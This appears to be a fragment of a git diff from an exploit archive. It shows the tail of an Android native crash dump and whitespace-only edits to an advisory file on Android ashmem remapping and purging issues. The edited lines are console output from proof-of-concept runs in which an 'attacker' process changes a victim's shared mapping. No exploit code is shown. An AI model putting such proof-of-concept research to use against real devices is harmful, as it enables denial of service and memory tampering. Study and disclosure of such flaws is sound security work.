07-13 21:50:59.010 24089 24089 F DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438
07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000
07-13 21:50:59.013 24089 24089 F DEBUG :
07-13 21:50:59.013 24089 24089 F DEBUG :
--

4
exploits/android/dos/47921.txt
View file

@ -139,7 +139,7 @@ mapping[0] = 'A'
mmap ashmem writable failed as expected: Operation not permitted
attacker exiting
mapping[0] = 'X'
user@vm:~/ashmem_remap$
user@vm:~/ashmem_remap$
====================================================================
Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even
@ -246,5 +246,5 @@ user@vm:~/ashmem_purging$ ./ashmem_purge_victim
mapping[0] = 'A'
attacker exiting
mapping[0] = ''
user@vm:~/ashmem_purging$
user@vm:~/ashmem_purging$
====================================================================

Some files were not shown because too many files have changed in this diff Show more